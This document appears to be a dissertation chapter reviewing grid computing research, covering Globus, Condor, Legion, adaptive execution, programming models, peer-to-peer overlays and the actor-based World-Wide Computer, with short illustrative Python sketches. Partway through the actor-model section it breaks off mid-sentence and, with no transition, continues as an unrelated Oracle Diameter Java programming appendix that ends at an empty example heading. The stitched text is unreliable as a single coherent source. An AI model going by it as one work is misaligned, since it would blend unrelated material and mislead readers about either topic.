This chapter focuses mainly on existing research in the area of grid resource management. The chapter is organized as follows. Section 2.1 surveys existing grid middleware systems. Section 2.2 discusses related work in resource management in grid systems. Section 2.3 discusses existing work in adaptive execution of grid applications. Section 2.4 presents various programming models that are good candidates for developing grid applications. In Section 2.5, we review basic peer-to-peer concepts and how they have been used in grid systems. Finally, Section 2.6 gives an overview of the worldwide computing project and presents several key concepts that have been fundamental to this dissertation.
2.1 Grid Middleware Systems
Over the last few years, several efforts have focused on building the basic software tools to enable resource sharing within scientific collaborations. Among these efforts, the most successful have been Globus [45], Condor [105], and Legion [29].
Figure 2.1: A layered grid architecture and components (adapted from [14]).
The Globus toolkit has emerged as the de facto standard middleware infrastructure for grid computing. Globus defines several protocols, APIs, and services that provide solutions to common grid deployment problems such as authentication, remote job submission, resource discovery, resource access, and transfer of data and executables. Globus adopts a layered service model that is analogous to the layered network model. Figure 2.1 shows the layered grid architecture that the Globus project adopts. The different layers of this architecture are briefly described in Table 2.1.
Condor is a distributed resource management system that is designed to support high-throughput computing by harvesting idle resource cycles. Condor discovers idle resources in a network and allocates them to application tasks [104]. Fault-tolerance is also supported through checkpointing mechanisms.
Layer | Description
Grid Fabric | Distributed resources such as clusters, machines, supercomputers, storage devices, scientific instruments, etc.
Core Middleware | A bag of services that offer remote process management, allocation of resources from different sites to be used by the same application, storage management, information registration and discovery, security, and Quality of Service (QoS).
User Level Middleware | A set of interfaces to core middleware services to provide higher levels of abstraction to end applications. These include resource brokers, programming tools, and development environments.
Grid Applications | Applications developed using grid-enabled programming models such as MPI.

Table 2.1: Layers of the grid architecture.

Legion specifies an object-based virtual machine environment that transparently integrates grid system components into a single address space and file system. Legion plays the role of a grid operating system by addressing issues such as process management, input-output operations, inter-process communication, and security [80].
Condor-G [49] combines both Condor and Globus technologies. This merging combines Condor's mechanisms for intra-domain resource management and fault-tolerance with Globus protocols for security and inter-domain resource discovery, access, and management. Entropia [30] is another popular system that utilizes cycle harvesting mechanisms. Entropia adopts mechanisms similar to Condor's for resource allocation, scheduling, and job migration. However, it is tailored only for Microsoft Windows 2000 machines, while Condor targets both Unix and Windows platforms. WebOS [111] is another research effort with the goal of providing operating system services to wide area applications, such as resource discovery, remote process execution, resource management, authentication, security, and a global namespace.
2.2 Resource Management in Grid Systems
The nature of grid systems has dictated the need to come up with new models and protocols for grid resource management. Grid resource management differs from conventional cluster resource management in several aspects. In contrast to cluster systems, grid systems are inherently more complex, dynamic, heterogeneous, autonomous, unreliable, and large-scale. Several requirements need to be met to achieve efficient resource management in grid systems:
• Site autonomy. Traditional resource management systems assume tight control over the resources. These assumptions make it easier to design efficient policies for scheduling and load balancing. Such assumptions disappear in grid systems, where resources are dispersed across several administrative domains with different scheduling policies, security mechanisms, and usage patterns. Additionally, resources in grid systems have a non-deterministic nature; they might join or leave at any time. It is therefore critical for a grid resource management system to take all these issues into account and preserve the autonomy of each participating site.
• Interoperability. Different sites use different local resource management systems, such as the Portable Batch System (PBS), Load Sharing Facility (LSF), Condor, etc. Meta-schedulers need to be built that are able to interface and inter-operate with all the different local resource managers.
• Flexibility and extensibility. As systems evolve, new policies get implemented and adopted. The resource management system should be extensible and flexible enough to accommodate newer systems.
• Support of negotiation. QoS is an important requirement for meeting application-level requirements and guarantees. Negotiation between the different participating sites is needed to ensure that local policies will not be broken and that the running applications will satisfy their requirements with certain guarantees.
• Fault tolerance. As systems grow in size, the chance of failures becomes non-negligible. Replication, checkpointing, job restart, or other forms of fault-tolerance have become a necessity in grid environments.
• Scalability. All resource management algorithms should avoid centralized protocols to achieve more scalability. Peer-to-peer and hierarchical approaches are good candidate protocols.

System | Architecture | Resource Discovery/Dissemination | QoS and Profiling | Scheduling
Globus | Hierarchical | Decentralized query discovery; periodic push dissemination | Partial support of QoS; state estimation relies on external tools such as NWS for profiling and forecasting of resources' performance | Decentralized; uses external schedulers for intra-domain scheduling
Condor | Flat | Centralized query discovery; periodic push dissemination | No support of QoS; matchmaking between client requests and resources' capabilities | Centralized
Legion | Hierarchical | Decentralized query discovery; periodic pull dissemination | Partial support of QoS; several schedules may be generated, and the best is selected by the scheduler | Hierarchical

Table 2.2: Characteristics of some grid resource management systems.
The subsequent sections survey the main grid resource management systems, how they have addressed some of the issues discussed above, and their limitations. For each system, we will discuss its mechanisms for resource dissemination, discovery, scheduling, and profiling. Resource dissemination protocols can be classified as using either push or pull models. In the push model, information about resources is periodically pushed to a database. The opposite is done in a pull model, where resources are periodically probed to collect information about them. Table 2.2 provides a summary of some characteristics of the resource management features of the surveyed systems.
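The push/pull distinction above can be made concrete with a minimal sketch: in push, each resource initiates its own status update; in pull, the registry initiates the probing. The `Node` and `Registry` classes are invented for illustration and are not the API of any surveyed system.

```python
# Minimal sketch contrasting push and pull resource dissemination.
# Classes and attribute names are illustrative assumptions.

class Node:
    def __init__(self, name, load):
        self.name, self.load = name, load

    def report(self):
        return {"name": self.name, "load": self.load}

class Registry:
    def __init__(self):
        self.db = {}

    # Push model: each resource periodically sends its own state.
    def receive_push(self, info):
        self.db[info["name"]] = info

    # Pull model: the registry periodically probes every known resource.
    def pull_from(self, nodes):
        for node in nodes:
            self.db[node.name] = node.report()

nodes = [Node("a", 0.3), Node("b", 0.7)]

push_registry = Registry()
for n in nodes:
    push_registry.receive_push(n.report())   # resource-initiated updates

pull_registry = Registry()
pull_registry.pull_from(nodes)               # registry-initiated probing
```

Both end up with the same database; the trade-off is in who pays the periodic cost and how stale the information is allowed to become.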
2.2.1 Resource Management in Globus
A Globus resource management system consists of resource brokers, resource co-allocators, and resource managers, also referred to as Globus Resource Allocation Managers (GRAM). The task of co-allocation refers to allocating resources from different sites or administrative domains to be used by the same application. Dissemination of resources is done through an information service called the Grid Information Service (GIS), also known as the Monitoring and Discovery Service (MDS) [36]. MDS uses the Lightweight Directory Access Protocol (LDAP) [34] to interface with the gathered information about resources. MDS stores information about resources such as the number of CPUs, the operating systems used, the CPU speeds, the network latencies, etc. MDS consists of a Grid Index Information Service (GIIS) and a Grid Resource Information Service (GRIS). GRIS provides resource discovery services such as gathering, generating, and publishing data about resource characteristics in an MDS directory. GIIS tries to provide a global view of the different information gathered from the various GRIS services. The aim is to make it easy for grid applications to look up desired resources and match them to their requirements. GIIS indexes the resources in a hierarchical namespace organization. Resource information is updated in GIIS by push strategies. Resource brokers discover resources by querying MDS.
Globus relies on local schedulers that implement Globus interfaces to resource brokers. These schedulers could be application-level schedulers (e.g., AppleS [16]), batch systems (e.g., PBS), etc. Local schedulers translate application requirements into a common language, called the Resource Specification Language (RSL). RSL is a set of expressions that specify the jobs and the characteristics of the resources required to run them. Resource brokers are responsible for taking high-level descriptions of resource requests and translating them into more specialized and concrete specifications. The transformed request should contain concrete resources and their actual locations. This process is referred to as specialization.
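The specialization step can be pictured as filtering an abstract requirement down to concrete resources with actual locations. The request format, attribute names, and host names below are invented for illustration and are not RSL syntax.

```python
# Illustrative sketch of broker "specialization": an abstract resource
# request becomes a list of concrete resources. Not actual RSL.

available = [
    {"host": "node1.site-a.edu", "cpus": 8,  "os": "linux"},
    {"host": "node2.site-b.edu", "cpus": 32, "os": "linux"},
]

def specialize(request, resources):
    """Replace an abstract requirement with the concrete resources meeting it."""
    return [r for r in resources
            if r["cpus"] >= request["min_cpus"] and r["os"] == request["os"]]

concrete = specialize({"min_cpus": 16, "os": "linux"}, available)
```

A real broker would additionally rank the candidates and hand the chosen set to a co-allocator, as described next.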
Specialized resource requests are passed to co-allocators, who are responsible for allocating requests at multiple sites to be used simultaneously by the same application. The actual scheduling and execution of submitted jobs is done by the local schedulers. GRAM authenticates the resource requests and schedules them using the local resource managers. GRAM tries to simplify the development and deployment of grid applications by providing common APIs that hide the details of local schedulers, queuing systems, interfaces, etc. Grid users and developers do not need to know all the details of other systems. GRAM acts as an entry point to various implementations of local resource management. It uses the concept of the hourglass, where GRAM is the neck of the hourglass, with applications and higher-level services (such as resource brokers or meta-schedulers) above it and local control and access mechanisms below it.
To sum up, Globus provides a bag of services to simplify resource management at a meta-level. The actual scheduling still needs to be done by the individual resource brokers. Ensuring that an application efficiently uses resources from various sites is still a complex task. Developers still need to bear the burden of understanding the requirements of the application, the characteristics of the grid resources, and the optimal ways of scheduling the application using dynamic grid resources to achieve high performance.
2.2.2 Resource Management in Condor
The philosophy of Condor [105] is to maximize the utilization of machines by harvesting idle cycles. A group of machines managed by a Condor scheduler is called a Condor pool. Condor uses a centralized scheduling management scheme. A machine in the pool is dedicated to scheduling and information management. Submitted jobs are queued and transparently scheduled to run on the available machines of the pool. Job resource requests are communicated to the manager using the Classified Advertisements (ClassAds) [35] resource specification language². Attributes such as processor type, operating system, and available memory and disk space are used to indicate jobs' resource requirements.
Resource dissemination is done through periodic push mechanisms. Machines periodically advertise their capabilities and their job preferences in advertisements that also use the ClassAds specification language. When a job is submitted to the Condor scheduler by a client machine, matchmaking is used to find the jobs and machines that best suit each other. Information about the chosen resources is then returned to the client machine. A shadow process is forked on the client machine to take care of transferring executables and I/O redirection.
² The resource specification language used by Globus follows Condor's model for ClassAds. However, Globus's language is more flexible and expressive.
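The matchmaking idea described above is two-way: both jobs and machines advertise attributes plus a requirements predicate, and a match requires each side to satisfy the other. The dictionaries and lambdas below are a toy illustration, not actual ClassAds syntax.

```python
# Toy sketch of ClassAds-style two-way matchmaking.
# Data layout and attribute names are illustrative assumptions.

job_ad = {
    "attrs": {"owner": "alice"},
    "requirements": lambda m: m["os"] == "linux" and m["memory_mb"] >= 512,
}
machine_ads = [
    {"attrs": {"os": "linux", "memory_mb": 256},
     "requirements": lambda j: True},
    {"attrs": {"os": "linux", "memory_mb": 2048},
     "requirements": lambda j: j["owner"] != "banned"},
]

def matchmake(job, machines):
    """Return the first machine whose attributes satisfy the job's requirements
    and whose own requirements accept the job (two-way matching)."""
    for machine in machines:
        if job["requirements"](machine["attrs"]) and \
           machine["requirements"](job["attrs"]):
            return machine
    return None

match = matchmake(job_ad, machine_ads)   # picks the 2048 MB linux machine
```

The symmetry is what preserves machine autonomy: a machine's ad can reject jobs just as a job's ad can reject machines.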
Flocking [39] is an enhancement of Condor to share idle cycles across several administrative domains. Flocking allows several pool managers to communicate with one another and to submit jobs across pools. To overcome the problem of not having shared file systems, a split-execution model is used: I/O commands generated by a job are captured and redirected to the shadow process running on the client machine. This technique avoids transferring files or mounting foreign file systems.
Condor supports job preemption and checkpointing to preserve machine autonomy. Jobs can be preempted and migrated to other machines if their current machines decide to withdraw from the computation.
Condor adopts the philosophy of high-throughput computing (HTC) as opposed to high-performance computing (HPC). In HTC systems, the objective is to maximize the throughput of the entire system, as opposed to maximizing individual application response time in HPC systems. A combination of both paradigms should exist in grids to achieve efficient execution of multi-scale applications. Improving utilization and improving the overall response and running time of large multi-scale applications are both important to justify the applicability of grid environments. On the one hand, application users will not be willing to use grids unless they expect to dramatically improve their performance. On the other hand, the grid computing vision tries to minimize idle resources by allowing resource sharing at a large scale.
2.2.3 Resource Management in Legion
Legion [29] is an object-based system that provides an abstraction over wide area resources as a worldwide virtual computer, playing the role of a grid operating system. It provides, in a grid setting, some of the traditional features that an operating system provides, such as a global namespace, a shared file system, security, process creation and management, I/O, resource management, and accounting [80]. Everything in Legion is an object: an active process that reacts to function invocations from other objects in the system. Legion provides high-level specifications and protocols for object interaction. The implementations still have to be done by the users. Legion objects are managed by their own class object instances. The class object is responsible for creating new instances, activating or deactivating them, and scheduling them. Legion defines core objects that implement system-level mechanisms: host objects represent compute resources, while vault objects represent persistent storage resources.
The resource management system in Legion consists of four components: a scheduler, a schedule implementor, a resource database, and the pool of resources. Resource dissemination is done through a push model. Resources interact with the resource database, also called the collection. Users or schedulers obtain information about resources by querying the collection. For scalability purposes, there might be more than one collection object. These objects are capable of exchanging information about resources. Scheduling in Legion has a hierarchical structure. Higher-level schedulers schedule resources on clusters, while lower-level schedulers schedule jobs on the local resources. When a job is submitted, an appropriate scheduler (an application-specific scheduler or a default scheduler) is selected from the framework. The scheduler, also called the enactor object, is responsible for enforcing the schedule generated. There might be more than one schedule generated; the best schedule is selected, and when it fails, the next best is tried until all the schedules are exhausted.
Similar to Globus, Legion provides a framework for creating and managing processes in a grid setting. However, making efficient use of the overall framework to achieve high performance is still a job that falls to the application developers.
2.2.4 Other Grid Resource Management Systems
Several resource management systems for grid environments exist besides the discussed systems. 2K [65] is a distributed operating system that is based on CORBA. It addresses the problems of resource management in heterogeneous networks, dynamic adaptability, and configuration of entity-based distributed applications [64]. Bond [60] is a Java distributed agents system. The European DataGrid [56] is a Globus-based system for the storage and management of data-intensive applications. Nimrod [5] provides a distributed computing system for parametric modeling that supports a large number of computational experiments. Nimrod-G [25] is an extension of Nimrod that uses the Globus services and follows a computational economy model for scheduling. NetSolve [27] is a system that has been designed to solve computational science problems through a client-agent-server architecture. WebOS seeks to provide operating system services, such as client authentication, naming, and persistent storage, to wide area applications [111].
There is a large body of research into computational grids and grid-based middleware; hence this section only attempts to discuss a selection of this research area. The reader is referred to [66] and [115] for a more comprehensive survey of systems geared toward distributed computing on a large scale.
2.3 Adaptive Execution in Grid Systems
Globus middleware provides services needed for secure multi-site execution of large-scale applications, gluing together different resource management systems and access policies. The dynamic and transient nature of grid systems necessitates adaptive models that enable a running application to adapt itself to rapidly changing resource conditions. Adaptivity in grid computing has been mainly addressed by adaptive application-level scheduling and dynamic load balancing. Several projects have developed application-oriented adaptive execution mechanisms over Globus to achieve an efficient exploitation of grid resources. Examples include AppleS [17], Cactus-G [12], GrADS [40], and GridWay [59]. These systems share many features, with differences in the ways they are implemented.
AppleS [17] applications rely on structural performance models that allow prediction of application performance. The approach incorporates static and dynamic resource information, performance predictions, application- and user-specific information, and scheduling techniques to adapt the application's execution "on the fly". To make this approach more generic and reusable, a set of template-based software for a collection of structurally similar applications has been developed. After performing the resource selection, the scheduler determines a set of candidate schedules based on the performance model of the application. The best schedule is selected based on the user's performance criteria, such as execution time and turn-around time. The generated schedule can be adapted and refined to cope with the changing behavior of resources. Jacobi2D [18], Complib [94], and Mcell [28] are examples of applications that benefited from the application-level adaptive scheduling of AppleS.
Adaptive grid execution has also been explored in the Cactus project through support of migration [69]. Cactus is an open source problem-solving environment designed for solving partial differential equations. Cactus incorporates, through special components referred to as grid-aware thorns [11], adaptive resource selection mechanisms that allow applications to change their resource allocations via migration. Cactus also uses the concept of contract violation. Application migration is triggered whenever a contract violation is detected and the resource selector has identified alternative resources. Checkpointing, staging of executables, allocation of resources, and application restart are then performed. Some application-specific techniques were used to adapt large applications to run on the grid, such as adaptive compression, overlapping computation with communication, and redundant computation [12].
The GrADS project [40] has also investigated adaptive execution in the context of grid application development. The goal of the GrADS project is to simplify distributed heterogeneous computing in the same way that the World Wide Web simplified information sharing. Grid application development in GrADS involves the following components: 1) resource selection, performed by accessing the Globus MDS and the Network Weather Service [117] to get information about the available machines; 2) an application-specific performance modeler, used to determine a good initial matching list for the application; and 3) a contract monitor, which detects performance degradation and accordingly performs rescheduling to re-map the application to better resources. The main components involved in application adaptation are the contract monitor, the migrator, and the rescheduler, which decides when to migrate. The migrator component relies on application support to enable migration. The Stop Restart Software (SRS) [110] is a user-level checkpointing library used to equip the application with the ability to be stopped, checkpointed, and restarted with a different configuration. The rescheduler component allows migration on request and opportunistic migration. Migration cost is evaluated by considering the predicted remaining execution time in the new configuration, the current remaining execution time, and the cost of rescheduling. Migration happens only if the gain is greater than a 30% threshold [109].
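The migration test described above can be sketched as comparing the predicted time saved, net of the rescheduling cost, against the 30% threshold. The exact way GrADS normalizes the gain is an assumption here; only the three inputs and the threshold come from the description above.

```python
# Sketch of a GrADS-style migration test. The normalization by the current
# remaining time is an illustrative assumption.

def should_migrate(current_remaining, predicted_remaining_new,
                   rescheduling_cost, threshold=0.30):
    """Gain = fraction of the current remaining time saved by moving."""
    gain = (current_remaining - predicted_remaining_new - rescheduling_cost) \
           / current_remaining
    return gain > threshold

print(should_migrate(1000.0, 500.0, 100.0))  # saves 40% of remaining time -> True
print(should_migrate(1000.0, 800.0, 100.0))  # saves only 10% -> False
```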
In the GridWay [59] project, the application specifies its resource requirements and ranks the needed resources in terms of their importance. A submission agent automates the entire process of submitting the application and monitoring its performance. Application performance is evaluated periodically by running a performance degradation evaluator program and by evaluating the accumulated suspension time. The application has a job template which contains all the necessary parameters for its execution. The framework evaluates whether migration is worthwhile in case of a rescheduling event. The submission manager is responsible for the execution of a job during its lifetime. It is also responsible for performing job migration to a new resource. The framework is responsible for submitting jobs, preparing RSL files, performing resource selection, preparing the remote system, and canceling the job in case of a kill, stop, or migration event. When a performance slowdown is detected, rescheduling actions are initiated to find better resources. The resource selector tries to find the resources that minimize total response time (file transfer and job execution). Application-level schedulers are used to promote the performance of each individual application without considering the rest of the applications. Migration and rescheduling can be user-initiated or application-initiated.
2.4 Grid Programming Models
To achieve application adaptation to grid environments, the middleware must not only provide the necessary means for state estimation and reconfiguration of resources; the application's programming model should also allow the application to react to the different reconfiguration requests from the underlying environment. This functionality can take different forms, such as application migration, process migration, checkpointing, replication, partitioning, or change of application granularity.
In what follows, we describe existing programming models that appear to be relevant to grid environments and that provide some partial support for reconfiguration.
• Remote procedure calls (RPC) [20]. RPC uses the client-server model to implement concurrent applications that communicate synchronously. The RPC mechanism has traditionally been tailored for single-processor systems and tightly coupled homogeneous systems. GridRPC is a collaborative effort to extend the RPC model to support grid computing and to standardize its interfaces and protocols. The extensions basically consist of providing support for coarse-grained asynchronous systems. NetSolve [27] is a current implementation of GridRPC [92] based on a client-agent-server system. The role of the agent is to locate suitable resources and select the best ones. Load balancing policies are used to attempt a fair allocation of resources. Ninf [91] is another implementation, built on top of Globus services.
• Java-based models. Java is a powerful programming environment for developing platform-independent distributed systems. It was originally designed with distributed computing in mind; the applet and Remote Method Invocation (RMI) models are features of this design. The use of Java in grid computing has gained even more interest since the introduction of web services in the OGSI model. Several APIs and interfaces are being developed and integrated with Java. The Java Grande project is a large collaborative effort trying to bring the Java platform up to speed for high-performance applications. The Java Commodity Grid (CoG) toolkit [70] is another effort to provide Java-based services for grid computing. CoG provides an object-oriented interface to standard Globus toolkit services.
• Message passing. This model is the most widely used programming model for parallel computing. It provides application developers with a set of primitive tools that allow communication between different tasks, collective operations like broadcasts and reductions, and synchronization mechanisms. However, message passing is still a low-level paradigm and does not provide high-level abstractions for task parallelism. It requires a lot of expertise from developers to achieve high performance. Popular message passing libraries include MPI and the Parallel Virtual Machine (PVM) [41]. MPI has been implemented successfully on massively parallel processors (MPPs) and supports a wide range of platforms. However, existing portable implementations target homogeneous systems and have very limited support for heterogeneity. PVM provides support for dynamic addition of nodes and tolerates host failures. However, its limited ability to deliver the required high performance on tightly coupled homogeneous systems did not encourage wide adoption. Extensions of MPI to meet grid requirements have been actively pursued recently. MPICH-G2 is a grid-enabled implementation of MPI based on MPICH, a portable implementation of MPI. MPICH-G2 is built upon the Globus toolkit. MPICH-G2 allows the use of multiple heterogeneous machines to execute MPI applications. It automatically converts data in messages sent between machines of different architectures, and supports multi-protocol process communication through automatic selection of TCP for inter-machine messaging and more highly optimized vendor-supplied MPI implementations (whenever available) for intra-machine messaging.
• Actor model [7,54]. An actor is an autonomous entity that encapsulates
state and processing. Actors are concurrent entities that communicate asynchronously.
Processing in actors is solely triggered by message reception. In
response to a message, an actor can change its current state, create a new actor,
or send a message to other actors. The anatomy of actors facilitates autonomy,
mobility, and asynchronous communication and makes this model attractive for
open distributed systems. Several languages and frameworks have implemented
the Actor model (e.g., SALSA [114], Actor Foundry [81], Actalk [23], THAL [63]
and Broadway [97]). A more detailed discussion of the Actor model and the
SALSA language is given in Section 2.6.
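The actor semantics described above (encapsulated state, asynchronous messages, processing triggered only by message reception) can be illustrated with a small Python sketch using one mailbox per actor. This is a toy illustration, not SALSA or any of the frameworks cited.

```python
# Minimal actor sketch: the actor owns a mailbox and private state;
# the only way to affect that state is to send it a message.
import queue
import threading

class CounterActor:
    def __init__(self):
        self._count = 0                  # encapsulated state
        self._mailbox = queue.Queue()
        threading.Thread(target=self._run, daemon=True).start()

    def send(self, msg):                 # asynchronous: returns immediately
        self._mailbox.put(msg)

    def _run(self):
        while True:
            msg = self._mailbox.get()    # processing triggered by reception
            if msg == "inc":
                self._count += 1
            elif isinstance(msg, tuple) and msg[0] == "get":
                msg[1].put(self._count)  # reply via a channel carried in the message

actor = CounterActor()
for _ in range(3):
    actor.send("inc")
reply = queue.Queue()
actor.send(("get", reply))
print(reply.get(timeout=5))
```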
• Parallel Programming Models. Several models have emerged to abstract
application parallelism on distributed resources. The Master-Worker (MW)
model is a traditional parallel scheme whereby a master task dynamically defines
the tasks that must be executed and the data on which they operate.
Workers execute the assigned tasks and return the result to the master. This
model exhibits a very large degree of parallelism because it generates a dynamic
number of independent tasks. This model is very well suited for grids.
The AppLeS Master Worker Application Template (AMWT) provides adaptive
scheduling policies for MW applications. The goal is to select the best
placement of the master and workers on grid resources to optimize the overall
performance of the application. The Fork-join model is another model where
the degree of parallelism is dynamically determined. In this model, tasks are
dynamically spawned and data is dynamically agglomerated based on system
characteristics such as the amount of workload or the availability of resources.
This model employs a two-level scheduling mechanism. First, a number of virtual
processors are scheduled on a pool of physical processors. The virtual
processors represent kernel-level threads. Then user-level threads are spawned
to execute tasks from a shared queue. The forking and joining is done in
user-level space because it is much faster than at the kernel-thread level. Several
systems have implemented this model, such as Cray Multitasking [88], Process
Control [51], and Minor [76]. All the aforementioned implementations have
been targeted mainly at shared-memory and tightly coupled systems. Other
effective parallel programming models have been studied, such as divide and
conquer and branch and bound. The Satin [112] system is an example
of a hierarchical implementation of the divide and conquer paradigm
targeted for grid environments.
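The Master-Worker scheme in this bullet can be sketched in Python, with a shared task queue and threads standing in for grid workers; the scheduling and placement decisions that systems like AMWT make are out of scope here, and all names are illustrative.

```python
# Master-worker sketch: the master defines the tasks; workers pull
# from a shared queue and return results to the master.
import queue
import threading

def run_master_worker(tasks, fn, n_workers=4):
    todo, done = queue.Queue(), queue.Queue()
    tasks = list(tasks)
    for t in tasks:
        todo.put(t)                  # master defines the tasks dynamically

    def worker():
        while True:
            try:
                t = todo.get_nowait()
            except queue.Empty:
                return               # no more work
            done.put((t, fn(t)))     # return the result to the master

    threads = [threading.Thread(target=worker) for _ in range(n_workers)]
    for th in threads:
        th.start()
    for th in threads:
        th.join()
    return dict(done.get() for _ in range(len(tasks)))

print(run_master_worker(range(5), lambda x: x * x))
```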
2.5 Peer-to-Peer Systems and the Emerging Grid
Grid and peer-to-peer systems share a common goal: sharing and harnessing
resources across various administrative domains. However, they both evolved from
different communities and provide different services. Grid systems focus on providing
a collaborative platform that interconnects clusters, supercomputers, storage systems,
and scientific instruments from trusted communities to serve computationally intensive
scientific applications. Grid systems are of moderate size and are centrally or
hierarchically administered. Peer-to-peer (P2P) systems provide intermittent participation
for significantly larger untrusted communities. The most common P2P
applications are file sharing and search applications. It has been argued that grid
and P2P systems will eventually converge [48,99]. This convergence will likely happen
when participation in grids increases to the scale of P2P systems, when P2P
systems provide more sophisticated services, and when the stringent QoS requirements
of grid systems are loosened as grids host more popular user applications. In
what follows, we give an overview of P2P systems. Then we give an overview of some
research efforts that have tried to utilize P2P techniques to serve grid computing.
The peer-to-peer paradigm is a successful model that has been proved to achieve
scalability in large-scale distributed systems. As opposed to traditional client-server
models, every component in a P2P system assumes the same responsibilities, acting as
both a client and a server. The P2P approach is intriguing because it has managed to
circumvent many problems with the client/server model with very simple protocols.
There are two categories of P2P systems based on the way peers are organized and
on the protocol used: unstructured and structured. Unstructured systems impose
no structure on the peers. Every peer in an unstructured system is randomly connected
to a number of other peers (examples include Napster [3], Gnutella [33],
and KaZaA [2]). Structured P2P systems adopt a well-determined structure for interconnecting
peers. Popular structured systems include Chord [79], Pastry [74],
Tapestry [119], and CAN [98].
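The structured approach is easy to see in code: a system such as Chord places each key deterministically. The sketch below is a simplified illustration (no finger tables or routing) that hashes nodes and keys onto a 2^m identifier ring and stores each key on its successor.

```python
# Structured-overlay sketch: hash nodes and keys onto a 2^m identifier
# ring; a key lives on its "successor", the first node whose id is >=
# the key id, wrapping around the ring (the core placement idea in Chord).
import hashlib

M = 16  # identifier bits (toy value; Chord uses 160-bit SHA-1 ids)

def ring_id(name, m=M):
    digest = hashlib.sha1(name.encode()).hexdigest()
    return int(digest, 16) % (2 ** m)

def successor(key_id, node_ids):
    for n in sorted(node_ids):
        if n >= key_id:
            return n
    return min(node_ids)  # wrap around the ring

nodes = {ring_id("peer%d" % i): "peer%d" % i for i in range(4)}
key = ring_id("some-file.mp3")
print(nodes[successor(key, nodes)])  # the same owner every time: lookup is deterministic
```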
In a P2P system, peers can be organized in various topologies. These topologies
can be classified into centralized, decentralized and hybrid. Several P2P applications
have a centralized component. For instance, Napster, the first file sharing application
that popularized the P2P model, has a centralized search architecture. However,
the file sharing architecture is not centralized. The SETI@Home [13] project has
a fully centralized architecture. SETI@Home is a project that harnesses free CPU
cycles across the Internet (SETI is an acronym for Search for Extra-Terrestrial Intelligence).
The purpose of the project is to analyze radio telescope data for signals from
extra-terrestrial intelligence. One advantage of the centralized topology is the high
performance of the search because all the needed information is stored in one central
location. However, this centralized architecture creates a bottleneck and cannot scale
to a large number of peers. In the decentralized topology, peers have equal responsibilities.
Gnutella [33] is among the few pure decentralized systems. It has only an
initial centralized bootstrapping mechanism by which new peers learn about existing
peers and join the system. However, the search protocol in Gnutella is completely decentralized.
Freenet is another application with a pure decentralized topology.

Figure 2.2: Sample peer-to-peer topologies: centralized, decentralized and hybrid topologies.

With decentralization comes the cost of having a more complex and more expensive search
mechanism. Hybrid approaches emerged with the goal of addressing the weaknesses
of centralized and decentralized topologies, while benefiting from their advantages.
In a hybrid topology, peers have various responsibilities depending on how important
they are in the search process. An example of a hybrid system is the KaZaA [2]
system. KaZaA is a hybrid of the centralized Napster and the decentralized Gnutella.
It introduced a very powerful concept: super peers. Super peers act as local search
hubs. Each super peer is responsible for a small portion of the network. It acts as a
Napster server. These special peers are automatically chosen by the system depending
on their performance (storage capacity, CPU speed, network bandwidth, etc.) and
their availability. Figure 2.2 shows example centralized, decentralized, and hybrid
topologies.
P2P approaches have been mainly used to address resource discovery and presence
management in grid systems. Most current resource discovery mechanisms are
based on hierarchical or centralized schemes. They also do not address large-scale dynamic
environments where nodes join and leave at any time. Existing research efforts
have borrowed several P2P dynamic peer management and decentralized protocols
to provide more dynamic and scalable resource discovery techniques in grid systems.
In [48] and [100], a flat P2P overlay is used to organize the peers. Every virtual
organization (VO) has one or more peers. Peers provide information about one or
more resources. In [48], different strategies are used to forward queries about resource
characteristics, such as random walk, learning-based, and best-neighbor. A modified
version of the Gnutella protocol is used in [100] to route query messages across the
overlay of peers. Other projects [75,83] have adopted the notion of super peers
to organize, in a hierarchical manner, information about grid resources. Structured
P2P concepts have also been adopted for resource discovery in grids. An example is
the MAAN [26] project that proposes an extension of the Chord protocol to handle
complex search queries.
2.6 Worldwide Computing
Varela et al. [10] introduced the notion and vision of the World-Wide Computer
(WWC), which aims at turning the widespread resources in the Web into a virtual
mega-computer with a unified, dependable and distributed infrastructure. The WWC
provides naming, mobility, and coordination constructs to facilitate building widely
distributed computing systems over the Internet. The architecture of the WWC
consists of three software components: 1) SALSA, a programming language for application
development, 2) a distributed runtime environment with support for naming
and message sending, and 3) a middleware layer with a set of services for reconfiguration,
resource monitoring, and load balancing. Figure 2.3 shows the layered
architecture of the World-Wide Computer.

The WWC views all software components as a collection of actors. The Actor
model has been fundamental to the design and implementation of the WWC architecture.
We discuss in what follows concepts related to the Actor model of computation
and the SALSA programming language.
2.6.1 The Actor Model
The concept of actors was first introduced by Carl Hewitt at MIT in the 1970s to
refer to autonomous reasoning agents [54]. The concept evolved further with the work
of Agha and others to refer to a formal model of concurrent computation [9]. This
model contrasts with (and complements) the object-oriented model by emphasizing
concurrency and communication between the different components.
Figure 2.3: A Model for Worldwide Computing. Applications run on a virtual
network (a middleware infrastructure) which maps actors to locations in the
physical layer (the hardware infrastructure).
Actors are inherently concurrent and distributed objects that communicate with
each other via asynchronous message passing. An actor is an object because it encapsulates
a state and a set of methods. It is autonomous because it is controlled by a
This appendix describes programming Oracle Diameter applications in the following sections:
"IP and Routes Configuration"
"Tracing and Logging Mechanism"
Before a Java Diameter application is able to process messages exchanged with a distant peer, the IP configuration and Diameter protocol-specific configuration have to be done by the application as follows:
Create a DiameterStack instance.
Register the Diameter application to the Diameter stack.
Create listening points to bind to local transport addresses.
Configure routes and connect to Diameter peers.
An instance of the Diameter stack can be created as follows:
import oracle.sdp.diameter.*;

DiameterFactory myFactory;
DiameterStack myStack;

myFactory = DiameterFactory.getInstance();
myStack = myFactory.createDiameterStack("realm.domain.com",
                                        "server.realm.domain.com", null);
This code creates a Diameter stack for use by the local Diameter node, whose Fully Qualified Domain Name (FQDN) is server.realm.domain.com and whose Origin Realm is realm.domain.com.
When a Diameter application needs to listen for incoming connections on one or several transport addresses, it has to create one or several instances of the DiameterListeningPoint interface:
String localURI = "aaa://server.realm.domain.com:41001";
myStack.createDiameterListeningPoint(localURI);
As soon as the listening point has been created, the Diameter stack is ready to accept incoming connections from remote peers. If the Diameter stack receives a connection request from a peer that has not been declared in the routing table, then the isUnknownPeerAuthorized() method of the DiameterListener interface is called. The connection is accepted only if this method returns true.
Note: There is no need for the user application to keep references to the listening points, since they can be retrieved later by calling DiameterStack.getDiameterListeningPoints().
A Diameter client application can declare remote peers by using the createDiameterRoute() method.
The code fragment illustrated in Example B-1 configures two Diameter realms, realm1.domain.com and realm2.domain.com. The first realm is served by two peers, peer1.realm1.domain.com and peer2.realm1.domain.com, whereas the second realm is served by only one peer, peer.realm2.domain.com. The metric values (1 and 2) are such that peer1 and peer2 are set up in master/backup mode. Example B-1 illustrates the source code for setting up this peer configuration.
Example B-1 Configuring Peers
